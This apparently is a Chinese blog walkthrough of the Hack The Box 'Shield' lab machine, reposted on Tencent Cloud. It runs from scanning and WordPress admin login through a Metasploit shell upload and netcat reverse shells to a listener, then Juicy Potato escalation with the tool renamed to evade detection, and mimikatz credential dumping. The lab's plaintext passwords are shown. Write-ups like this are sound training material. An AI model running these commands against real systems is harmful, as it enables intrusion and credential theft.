前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >HTB-Shield通关过程

HTB-Shield通关过程

作者头像
网络安全自修室
发布2021-06-21 19:50:25
4240
发布2021-06-21 19:50:25
举报

扫描

根据给出的IP地址,使用nmap进行扫描

代码语言:javascript
复制
nmap -T4 -F -sV 10.10.10.28
-T4:针对TCP端口禁止动态扫描延迟超过10ms
-F:快速扫描,扫描一些常用端口
-sV:探测开启的端口来获取服务、版本信息

先去80端口看一下,发现是一个IIS的默认页面

爆破web目录

在github中下载dirsearch工具来爆破web路径,进入工具的路径下,执行

代码语言:javascript
复制
python3 dirsearch.py -u 10.10.10.29 -e *
-u:指定目标ip
-e:指定扩展名,例如:*.php,*.asp

发现了/wordpress目录,我们去访问一下,发现有登录入口,先点击右上角BLOG,再点击Log in跳转至wordpress的登陆页面

这里我们可以尝试使用之前靶机中使用过的密码尝试登录,发现上一章已经获取的admin:P@s5w0rd!这个组合可以登陆,成功进入到wordpress管理页面

获取webshell

有了wordpress管理权限,我们可以尝试使用metasploit获取webshell

代码语言:javascript
复制
msfconsole                      //进入kali的metasploit攻击框架
search wp_admin                 //查找wordpress获取webshell的利用模块
use 0                           //使用编号为0的模块
show options                    //显示设置需要配置的参数

Required位置显示yes的都需要配置

逐一配置参数,运行成功后会自动删除利用过程中上传的payload,并且建立一个meterpreter shell

代码语言:javascript
复制
set PASSWORD P@s5w0rd!
set RHOSTS 10.10.10.29
set TARGETURI /wordpress
set USERNAME admin
set LHOST 10.10.16.4             //此处为本地地址,可用ifconfig查看
run                              //运行

由于meterpreter shell不是非常稳定,我们需要利用nc获取一个相对稳定的shell,在kali中自带nc.exe,我们先将其复制到桌面上一份

代码语言:javascript
复制
find / -name "nc.exe"
cp /usr/share/windows-resources/binaries/nc.exe ~/桌面

再通过meterpreter shell上传至目标机器的uploads目录中

代码语言:javascript
复制
cd ../../uploads
upload nc.exe

接下来,我们先在kali启动nc并监听7777端口,然后在meterpreter shelluploads目录中执行如下代码后,可以看到nc获取到了shell

代码语言:javascript
复制
execute -f nc.exe -a "-e cmd.exe 10.10.16.4 7777"
-f:执行-f参数所指定的文件
-a:传递给命令的参数
-e:命令netcat执行某个程序,常用于后门建立过程

提权

我们回到meterpreter shell中,执行命令sysinfo,发现系统为Windows Server 2016,此系统容易受到Rotten Potato攻击,原理见:https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

首先我们在github中下载利用工具juicy-potato并重新命名为js.exe防止防火墙检测到,再用meterpreter shell将js.exe上传到uploads文件夹内

代码语言:javascript
复制
upload js.exe

接着用刚才获取到的nc shell在目标机器上生成一个批处理文件,目的是让netcat将靶机的powershell发送至kali的1111端口

代码语言:javascript
复制
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.16.4 1111 > shell.bat

然后再次在kali中启动一个nc并监听1111端口来接收提权后的nc shell,并在获取的nc shell中运行js.exe

代码语言:javascript
复制
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
-t *:创建使用TokenW和User两种模式的进程
-p:指定要运行的程序(无法传递带参数的命令,所以要提前用bat写好)
-l:COM服务监听的端口

此时回到kali中监听1111端口的nc中,执行whoami命令,发现已经获得了SYSTEM权限的shell

此时我们有三个shell,在kali中分别是:4444端口的meterpreter shell、7777端口的普通权限的nc shell、1111端口的SYSTEM权限的nc shell

获取flag

利用SYSTEM权限的nc shell,进入桌面中,即可在root.txt中获取flag

代码语言:javascript
复制
cd c:\users\administrator\desktop
dir
cat root.txt

后续

我们可以在github中下载mimikatz,并同样用meterpreter shell上传到uploads目录下(过程省略),来获取域用户信息,然后使用SYSTEM权限的nc shell使用这个工具

代码语言:javascript
复制
cd c:\inetpub\wwwroot\wordpress\wp-content\uploads
./mimikatz.exe
sekurlsa::logonpasswords

即可获取域用户信息Sandra的和其明文登陆密码sandra:Password1234!,用于下一个靶机

参考资料

参考文章地址:https://blog.csdn.net/m0_48066270/article/details/108811178?ivk_sa=1024320u

mimikatz:https://github.com/gentilkiwi/mimikatz

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-06-13,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全自修室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 扫描
  • 爆破web目录
  • 获取webshell
  • 提权
  • 获取flag
  • 后续
  • 参考资料
相关产品与服务
网站建设
网站建设(Website Design Service,WDS),是帮助您快速搭建企业网站的服务。通过自助模板建站工具及专业设计服务,无需了解代码技术,即可自由拖拽模块,可视化完成网站管理。全功能管理后台操作方便,一次更新,数据多端同步,省时省心。使用网站建设服务,您无需维持技术和设计师团队,即可快速实现网站上线,达到企业数字化转型的目的。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档